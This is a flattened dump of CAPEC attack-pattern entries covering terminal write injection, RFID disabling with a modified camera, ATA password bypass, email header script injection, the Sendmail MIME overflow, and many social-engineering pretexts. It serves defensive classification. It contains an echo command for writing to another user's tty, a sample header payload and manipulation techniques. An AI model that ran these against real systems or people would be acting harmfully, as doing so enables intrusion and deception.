Updated Description Summary, Payload This attack exploits terminal devices that allow themselves to be written to by other users. The attacker sends command strings to the target terminal device hoping that the target user will hit enter and thereby execute the malicious command with their privileges. The attacker can send the results (such as copying /etc/passwd) to a known directory and collect once the attack has succeeded. User terminals must have a permissive access control such as world writeable that allows normal users to control data on other user's terminals. Very High High Injection "Any system that allows other peers to write directly to its terminal process is vulnerable to this type of attack. If the terminals are available through being over-privileged (i.e. world-writable) or the attacker is an administrator, then a series of commands in this format can be used to echo commands out to victim terminals. "$echo -e "\033[30m\033\132" > /dev/ttyXX where XX is the tty number of the user under attack. This will paste the characters to another terminal (tty). Note this technique works only if the victim's tty is world writable (which it may not be). That is one reason why programs like write(1) and talk(1) in UNIX systems need to run setuid." [R.40.1][REF-2] If the victim continues to hit "enter" and execute the commands, there are an endless supply of vectors available to the attacker, copying files, open up network connections, ftp out to servers, and so on. Low Access to a terminal on the target network Design: Ensure that terminals are only writeable by named owner user and/or administrator Design: Enforce principle of least privilege Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Read application data Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Payload delivered through standard user terminal. Command(s) executed directly on host, in other victim's terminal Multi-user host Enables attacker to execute server side code with any commands that the program owner has privileges to. 306 Targeted 74 Targeted 1000 Attack Pattern ChildOf 249 Exploitation High High Low Mainframe Other UNIX-LINUX All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.40.1][REF-2] Cigital, Inc 2007-01-01 [R.40.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Examples Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Examples Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Examples-Instances An attacker uses methods to deactivate a passive RFID tag for the purpose of rendering the tag, badge, card, or object containing the tag unresponsive. RFID tags are used primarily for access control, inventory, or anti-theft devices. The purpose of attacking the RFID chip is to disable or damage the chip without causing damage to the object housing it. When correctly performed the RFID chip can be disabled or destroyed without visible damage or marking to whatever item or device containing the chip. Attacking the chip directly allows for the security device or method to be bypassed without directly damaging the device itself, such as an alarm system or computer system Various methods exist for damaging or deactivating RFID tags. For example, most common RFID chips can be permanently destroyed by creating a small electromagnetic pulse near the chip itself. One method employed requires the modifying a disposable camera by disconnecting the flash bulb and soldering a copper coil to the capacitor. Firing the camera in this configuration near any RFID chip-based device creates an EMP pulse sufficient to destroy the chip without leaving evidence of tampering. So far this attack has been demonstrated to work against RFID chips in the 13.56 MHz range. 1000 Attack Pattern ChildOf 396 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content An attacker exploits weaknesses in the physical hardware of a machine in order to gain unauthorized access to the device or system. Hacking hardware devices falls into several broad categories depending upon the relative sophistication of the attacker and the type of systems that are targeted. Attacks against hardware devices differ from software attacks in that hardware-based attacks target the chips, circuit boards, device ports, or other components that comprise a computer system or embedded system. The most common hardware devices which are attacked are computer systems such as laptops, desktops and server platforms. Simple attacks may range from inserting an unauthorized USB drive into a system or using a Boot disk or CD to gain access to an unprotected system. Other more sophisticated attacks may involve adding or removing jumpers to an exposed system, or applying sensors to portions of the motherboard to read data as it traverses the system bus. Some level of physical access to the device being attacked. 1000 Attack Pattern ChildOf 390 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content An attacker exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). Once the drive is installed into the new system the BIOS can be used to reset the drive password. Access to the system containing the ATA Drive so that the drive can be physically removed from the system. 1000 Attack Pattern ChildOf 401 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 9: Hacking Hardware 6th Edition McGraw Hill 2009 Tom Stracener MITRE 2010-11-21 Tom Stracener MITRE 2010-11-21 Sean Barnum MITRE 2010-11-21 Review and revision of content Sean Barnum MITRE 2010-11-21 Review and revision of content An attacker manipulates people into performing actions or divulging confidential information, as well as possible access to computer systems or facilities. While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim Low The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content An attacker employs various means of gathering information about a target company, organization, or person. These techniques may range from using telephones, gathering trash or other discarded information, intrusion within company property, using the Internet for research, to querying individuals under false or misleading pretenses. A social engineer can use many small pieces of information to combine into a useful vulnerability of a system. Information can be important whether it comes from the janitor's office or from the CEO's office; each piece of paper, employee spoken to or area visited by the social engineer can add up enough information to attain access to sensitive data and resources of the company. The lesson here is all information, no matter how insignificant the employee believes it to be, may assist in creating a vulnerability for a company and an entrance for a social engineer. While the ultimate goal of the attacker may vary the purpose of these attacks is usually to gain access to computer systems or facilities. Low 1000 Attack Pattern ChildOf 403 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content An attacker employs various methods of information gathering to collect a body of information that facilitates the attackers' goals toward the target organization. Because an attacker's goals can vary so widely during this phase there is no one particular methodology that is often employed. During the research phase, for example, an attacker could use a company's automated directory service via the telephone to identify individuals in key positions of authority. Other methods could involve casing an establishment during high traffic hours to determine how strictly employees monitor who is entering the building behind them or something as simple as internet searching. Gathering information to support social engineering exercises is much the same as research you do for anything else. You need a goal in mind when you start in order to keep the research focused. Having a clear objective helps you determine what information is relevant to the end goal and what can be ignored. This holds true not only for the information gathered but also for how it's gathered. Low 1000 Attack Pattern ChildOf 404 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker cases an establishment and searches through trash bins, dumpsters, or areas where company information may have been accidentally discarded for information items which may be useful to the dumpster diver. The devastating nature of the items and/or information found can be anything from medical records, resumes, personal photos and emails, bank statements, account details or information about software, tech support logs and so much more. By collecting this information an attacker may be able to learn important facts about the person or organization that play a role in helping the attacker in their attack. Low 1000 Attack Pattern ChildOf 404 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content An attacker engages in pretexting behavior to solicit information from target persons, or manipulate the target into performing some action that serves the attackers' interests. During a pretexting attack the attacker creates an invented scenario, assuming an identity or role to persuade a targeted victim to release information or perform some action. It is more than just creating a lie, in some cases it can be creating a whole new identity and then using that identity to manipulate the receipt of information. Pretexting can also be used to impersonate people in certain jobs and roles that they never themselves have done. Basic pretexting attacks may simply seek to learn information about a target, but more complicated pretexting attacks seek to solicit a target to perform some action that assists the attacker in exploiting organizational weaknesses or obtaining access to secure facilities or systems. One example of a pretexting attack could be to dress up like a jogger and run in place by the entrance of a building, pretending to look for your access card. Because the hood obscures you face, it may be possible to solicit someone inside the building to let you inside. Pretexting is also not a one-size fits all solution. A social engineering attacker will have to develop many different pretexts over their career. All of them will have one thing in common, research. Good information gather techniques can make or break a good pretext. Being able to mimic the perfect tech support rep is useless if the target does not use outside support. Pretexting is also used in other areas of life other than social engineering. Sales, public speaking, so-called fortune tellers, NLP experts and even doctors, lawyers, therapists and the like all have to use a form of pretexting. They all have to create a scenario where a person is comfortable with releasing information they normally would not. One of the most important aspects of social engineering is trust. If the attacker cannot build trust they will most likely fail. A solid pretext is an essential part of building trust. If an attacker's alias, story, or identity has holes or lacks credibility or even the perception of credibility the target will most likely catch on. Similar to inserting the proper key in a lock, the right pretext provides the proper cues to those around the attacker and can disarm their suspicions or doubts and open up the doors, so to speak. . Low 1000 Attack Pattern ChildOf 404 1000 Attack Pattern ChildOf 410 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker engages in information gathering activities from traditional sources which are typically open, publicly available sources of information that don't require any illegal activity to obtain.. Tradition sources can include corporate websites, DNS (Domain Name Service) records, or even social media sites such as blogs or wikis. The goal is to collect as much information as possible so as to construct an accurate model that aids the attacker in conducting further social engineering attacks. Low 1000 Attack Pattern ChildOf 404 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker uses sources of information which are less obvious and often overlooked to learn about the target person or organization. These sources could be industry experts or insiders who might reveal key pieces of information that help the attacker determine possible social engineering vulnerabilities in the target. Other types of oblique information gathering might be to case or stalk particular employees to find out popular after work venues. The attacker would then visit that venue and sit in close proximity to the target individuals to gather information. Low 1000 Attack Pattern ChildOf 404 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system. Identify and characterize metacharacter-processing vulnerabilities in email headers An attacker creates emails with headers containing various metacharacter-based malicious payloads in order to determine whether the target application processes the malicious content and in what manner it does so. Use an automated tool (fuzzer) to create malicious emails headers containing metacharacter-based payloads. env-Web Manually tampering email headers to inject malicious metacharacter-based payload content in them. env-Web The email client processes metacharacters in email headers. env-Local The email client does not process metacharacters in email headers. env-Local The email server will strip the headers that contain metacharacters env-Web The email server lets the malicious metacharacters in the email headers. env-Web The email client executes the malicious payload. No malicious content is being delivered in the email by the server. Monitor email headers for malicious content in metacharacters. An attacker leverages vulnerabilities identified during the Experiment Phase to inject malicious email headers and cause the targeted email application to exhibit behavior outside of its expected constraints. Send emails with specifically-constructed, metacharacter-based malicious payloads in the email headers to targeted systems running email processing applications identified as vulnerable during the Experiment Phase. env-Local The payload executes on the target user's system. Filtering email headers for malicious content. This attack targets most widely deployed feature rich email applications, including web based email programs. High High Injection API Abuse To:<someone@example.com> From:<badguy@example.com> Header<SCRIPT>payme</SCRIPT>def: whatever Meta-characters are among the most valuable tools attackers have to deceive users into taking some action on their behalf. E-mail is perhaps the most efficient and cost effective attack distribution tool available, this has led to the phishing pandemic. Meta-characters like \w \s \d ^ can allow the attacker to escape out of the expected behavior to execute additional commands. Escaping out the process (such as email client) lets the attacker run arbitrary code in the user's process. Low To distribute email Design: Perform validation on email header data Implementation: Implement email filtering solutions on mail server or on MTA, relay server. Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Email Metacharacters Email processing routines of Email program Enables attacker to execute server side code with any commands that the program owner has privileges to. 150 Targeted 88 Targeted 697 Targeted 713 Targeted 1000 Attack Pattern ChildOf 242 1000 Attack Pattern ChildOf 134 Penetration High High High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.41.1][REF-2] Cigital, Inc 2007-01-01 [R.41.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Examples Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Examples Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary An attacker engages an individual using any combination of social engineering methods for the purpose of extracting information. Accurate contextual and environmental queues, such as knowing important information about the target company or individual can greatly increase the success of the attack and the quality of information gathered. Authentic mimicry combined with detailed knowledge increases the success of elicitation attacks. Low 1000 Attack Pattern ChildOf 403 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content An attacker engages in pretexting behavior to solicit information from target persons, or manipulate the target into performing some action that serves the attackers' interests. Pretexting involves a mixture of role-play, subterfuge, and possibly some forms of disguise. Basic pretexting attacks may simply seek to learn information about a target, but more complicated pretexting attacks seek to solicit a target to perform some action that assists the attacker in exploiting organizational weaknesses or obtaining access to secure facilities or systems. One example of a pretexting attack could be to dress up like a jogger and run in place by the entrance of a building, pretending to look for your access card. Because the hood obscures you face, it may be possible to solicit someone inside the building to let you inside. Low 1000 Attack Pattern CanAlsoBe 407 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Deprecated as duplicate of CAPEC-407 Sean Barnum MITRE 2010-11-18 Deprecated as duplicate of CAPEC-407 CAPEC Content Team MITRE 2014-02-06 Updated Description Summary Pretexting An attacker engages in pretexting behavior, assuming the role of someone who works for Customer Service, to solicit information from target persons, or manipulate the target into performing an action that serves the attackers' interests. One example of a scenario such as this would be to call an individual, articulate your false affiliation with a credit card company, and then attempt to get the individual to verify their credit card number. Low 1000 Attack Pattern ChildOf 407 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker engages in pretexting behavior, assuming the role of a tech support worker, to solicit information from target persons, or manipulate the target into performing an action that serves the attackers' interests. An attacker who uses social engineering to impersonate a tech support worker can have devastating effects on a network. This is an effective attack vector, because it can give an attacker physical access to network computers. It only takes a matter of seconds for someone to compromise a computer with physical access. One of the best technological tools at the disposal of a social engineer, posing as a technical support person, is a USB thumb drive. These are small, easy to conceal, and can be loaded with different payloads depending on what task needs to be done. However, this form of attack does not require physical access as it can also be effectively carried out via phone or email. Low 1000 Attack Pattern ChildOf 407 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker engages in pretexting behavior, assuming the role of a delivery person, to solicit information from target persons, or manipulate the target into performing an action that serves the attackers' interests. Impersonating a delivery person is an effective attack and an easy attack since not much acting is involved. Usually the hardest part is looking the part and having all of the proper credentials, papers and "deliveries" in order to be able to pull it off. Low 1000 Attack Pattern ChildOf 407 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker engages in pretexting behavior, assuming some sort of trusted role, and contacting the targeted individual or organization via phone to solicit information from target persons, or manipulate the target into performing an action that serves the attackers' interests. This is the most common social engineering attack. Some of the most commonly effective approaches are to impersonate a fellow employee, impersonate a computer technician or to target help desk personnel. Low 1000 Attack Pattern ChildOf 407 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker exploits inherent human psychological predispositions to influence a targeted individual or group to solicit information or manipulate the target into performing an action that serves the attackers' interests. Many interpersonal social engineering techniques do not involve outright deception, although they can; many are subtle ways of manipulating a target to remove barriers, make the target feel comfortable, and produce an exchange in which the target is either more likely to share information directly, or let key information slip out unintentionally. A skilled attacker uses these techniques when appropriate to produce the desired outcome. Manipulation techniques vary from the overt, such as pretending to be a supervisor to a help desk, to the subtle, such as making the target feel comfortable with the attackers' speech and thought patterns. Low 1000 Attack Pattern ChildOf 403 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary Low 1000 Attack Pattern ChildOf 416 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content An attacker uses a social engineering technique to produce a sense of obligation within the target to volunteer some key or sensitive piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. In the context of social engineering, obligation is closely related to reciprocation but is not limited to it. There are various techniques for producing a sense of obligation during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily. It can also be as simple as holding an outer door for someone will usually make them hold the inner door for you. It can be escalated to someone giving you private info because you create a sense of obligation. This is a common attack vector when targeting customer service people. Low 1000 Attack Pattern ChildOf 417 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content Low 1000 Attack Pattern ChildOf 417 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-18 Review and revision of content Sean Barnum MITRE 2010-11-18 Review and revision of content An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back. Determine whether the mail server is unpatched and is potentially vulnerable to one of the known MIME conversion buffer overflows (e.g. Sendmail 8.8.3 and 8.8.4). Identify places in the system where vulnerable MIME conversion routines may be used. Send e-mail messages to the target system with specially crafted headers that trigger the buffer overflow and execute the shell code. The target system uses a mail server. Mail server vendor has not released a patch for the MIME conversion routine, the patch itself has a security hole or does not fix the original problem, or the patch has not been applied to the user's system. High High Injection Attack Example: Sendmail Overflow A MIME conversion buffer overflow exists in Sendmail versions 8.8.3 and 8.8.4. Sendmail versions 8.8.3 and 8.8.4 are vulnerable to a buffer overflow in the MIME handling code. By sending a message with specially-crafted headers to the server, a remote attacker can overflow a buffer and execute arbitrary commands on the system with root privileges. Sendmail performs a 7 bit to 8 bit conversion on email messages. This vulnerability is due to the fact that insufficient bounds checking was performed while performing these conversions. This gave attacker an opportunity to overwrite the internal stack of sendmail while it is executing with root privileges. An attacker first probes the target system to figure out what mail server is used on the system and what version. An attacker could then test out the exploit at their leisure on their own machine running the same version of the mail server before using it in the wild. CVE-1999-0047 Low It may be trivial to cause a DoS via this attack pattern High Causing arbitrary code to execute on the target system. The first step is to figure what mail server (and what version) is running on the target system. Stay up to date with third party vendor patches Disable the 7 to 8 bit conversion. This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file. For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration): Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40, T=DNS/RFC822/X-Unix, A=mail -d $u Mprog, P=/bin/sh, F=lsDFMoqeu, S=10/30, R=20/40, D=$z:/, T=X-Unix, A=sh -c $u This can be achieved for the "Mlocal" and "Mprog" Mailers by modifying the ".mc" file to include the following lines: define(`LOCAL_MAILER_FLAGS', ifdef(`LOCAL_MAILER_FLAGS', `translit(LOCAL_MAILER_FLAGS, `9')', `rmn')) define(`LOCAL_SHELL_FLAGS', ifdef(`LOCAL_SHELL_FLAGS', `translit(LOCAL_SHELL_FLAGS, `9')', `eu')) and then rebuilding the sendmail.cf file using m4(1). From "Exploiting Software", please see reference below. Use the sendmail restricted shell program (smrsh) Use mail.local Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Integrity Modify memory Availability DoS: crash / exit / restart Confidentiality Access_Control Authorization Gain privileges / assume identity The especially formatted e-mail message whose body is put together in a way as to trigger the MIME conversion buffer overflow in the 7 to 8 bit MIME conversion function. The shell code included as part of the e-mail message body that is executed on the target system with root privileges after the stack based buffer overflow in the 7 to 8 bit MIME conversion function is leveraged. The function performing 7 to 8 bit MIME conversion. 120 Targeted 119 Targeted 74 Targeted 20 Secondary CVE-1999-0047 A MIME conversion buffer overflow exists in Sendmail versions 8.8.3 and 8.8.4. Sendmail versions 8.8.3 and 8.8.4 are vulnerable to a buffer overflow in the MIME handling code. By sending a message with specially-crafted headers to the server, a remote attacker can overflow a buffer and execute arbitrary commands on the system with root privileges. Sendmail performs a 7 bit to 8 bit conversion on email messages. This vulnerability is due to the fact that insufficient bounds checking was performed while performing these conversions. This gave attacker an opportunity to overwrite the internal stack of sendmail while it is executing with root privileges. An attacker first probes the target system to figure out what mail server is used on the system and what version. An attacker could then test out the exploit at their leisure on their own machine running the same version of the mail server before using it in the wild. 1000 Attack Pattern ChildOf 100 Failing Securely Penetration Exploitation High High High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 CERT Advisory CA-1997-05 MIME Conversion Buffer Overflow in Sendmail Versions 8.8.3 and 8.8.4 Software Engineering Institute: Carnegie Mellon University http://www.cert.org/advisories/CA-1997-05.html [R.42.1][REF-2] Cigital, Inc 2007-03-01 [R.42.1][REF-2] Cigital, Inc 2007-03-01 Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Injection_Vector Low 1000 Attack Pattern ChildOf 416 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content An attacker uses a social engineering technique to convey a sense of authority that motivates the target reveal specific information or take specific action. There are various techniques for producing a sense of authority during ordinary modes of communication. One common method is impersonation. By impersonating someone with a position of power within an organization an attacker may motivate the target individual to reveal some piece of sensitive information or perform an action that benefits the attacker. Low 1000 Attack Pattern ChildOf 416 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content Low 1000 Attack Pattern ChildOf 416 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content Low 1000 Attack Pattern ChildOf 416 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content Low 1000 Attack Pattern ChildOf 416 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content An attacker uses framing techniques to contextualize a conversation so that the target is more likely to be influenced by the attackers' point of view. Framing is information and experiences in life that alter the way we react to decisions we must make. This type of persuasive technique exploits the way people are conditioned to perceive data and its significance, while avoiding negative or avoidance responses from the target. Rather than a specific technique framing is a methodology of conversation that slowly encourages the target to adopt to the attackers' perspective. One technique of framing is to avoid the use of the word "No" and to contextualize responses in a manner that is positive. When performed skillfully the target is much more likely to volunteer information or perform actions favorable to the attacker. Low 1000 Attack Pattern ChildOf 416 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Wikipedia Framing (social sciences) The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Framing_(social_sciences) Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary Low 1000 Attack Pattern ChildOf 416 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content Low 1000 Attack Pattern ChildOf 416 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content An attacker attunes their communication to the language and thought patterns of the target thereby weakening barriers or reluctance to communication. This method is a way of building rapport with a target by matching their speech patterns and the primary ways or dominant senses with which they make abstractions. This technique can be used to make the target more receptive to sharing information because the attacker has adapted their communication forms to match those of the target. When skillfully employed the target is likely to be unaware that they are being manipulated. Low 1000 Attack Pattern ChildOf 427 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, LLC http://www.social-engineer.org Tom Stracener MITRE 2010-11-17 Tom Stracener MITRE 2010-11-17 Sean Barnum MITRE 2010-11-17 Review and revision of content Sean Barnum MITRE 2010-11-17 Review and revision of content Low 1000 Attack Pattern ChildOf 427 The Official Social Engineering Portal Social-Engineer.org Tick Tock Computers, 